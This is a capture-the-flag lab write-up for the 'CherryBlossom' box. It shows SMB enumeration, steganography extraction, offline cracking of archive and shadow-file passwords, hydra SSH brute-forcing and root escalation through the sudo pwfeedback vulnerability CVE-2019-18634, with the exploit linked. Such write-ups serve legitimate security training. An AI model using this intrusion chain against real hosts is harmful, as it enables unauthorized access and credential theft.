# CherryBlossom

## Samba
```
$ enum4linux.pl 10.10.xx.xxx
```
Notice the share `Anonymous` and the users `johan` & `lily`.
```
$ smbclient '\\10.10.xx.xxx\Anonymous'
```
Get `journal.txt` and base64-decode it into a PNG `j.png`.
```
$ stegpy j.png
File _journal.zip succesfully extracted from j.png
```
Assuming it actually is a Zip, edit the (incorrect) header to `50 4B 03 04` (`PK\x03\x04`). Fine, but it is password protected...
```
$ zip2john _journal.zip > hzip
$ john --wordlist=$CTF_ROCKYOU hzip
...
september        (_journal.zip/Journal.ctz)
```
Extract, now we get a 7z archive `Journal.ctz`, also password protected.
```
$ 7z2john.pl Journal.ctz > hctz
$ john --wordlist=$CTF_ROCKYOU --format=7z-opencl hctz
...
tigerlily        (Journal.ctz)
```
Extract, we get `Journal.ctd`, an XML diary (Johan's one). The **journal flag** is near the end. Also extract the base64-encoded wordlists it contains (we will only need `cherry-blossom.list`).

## SSH as `lily`
According to the diary, Lily's password is in `cherry-blossom.list`.
```
$ hydra -l lily -P cherry-blossom.list 10.10.xx.xxx ssh
...
[22][ssh] host: 10.10.xx.xxx   login: lily   password: Mr.$un$hin3
```
Now we can log in as `lily`. Running [`LinEnum.sh`](https://github.com/rebootuser/LinEnum) on the remote host, we notice interesting files:
```
[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root shadow 771 Feb  9  2020 /var/backups/gshadow.bak
-r--r--r-- 1 root shadow 1481 Feb  9  2020 /var/backups/shadow.bak
-rw------- 1 root root 936 Feb  9  2020 /var/backups/group.bak
-rw------- 1 root root 2382 Feb  9  2020 /var/backups/passwd.bak
```
Get `/var/backups/shadow.bak` and attack it locally:
```
$ john shadow.bak --wordlist=cherry-blossom.list
...
Mr.$un$hin3      (lily)
##scuffleboo##   (johan)
```

## From `johan` to `root`
We cannot directly connect as `johan` through SSH, but we can `su johan` as `lily` and read the **user flag** in `/home/johan/user.txt`.

Trying `sudo -l`, we see the `*` over the password: the `pwfeedback` option is activated. That version 1.8.21p2 of `sudo` with that option activated is [vulnerable](https://www.exploit-db.com/exploits/47995) to an [exploit](https://github.com/saleemrashid/sudo-cve-2019-18634) ([see](https://www.exploit-db.com/exploits/48052) [also](https://github.com/Plazmaz/CVE-2019-18634)).

Upload [`exploit.c`](https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c), compile as `johan` with `gcc-7` and run to get a `root` shell. Read the **root flag** in `/root/root.txt`.
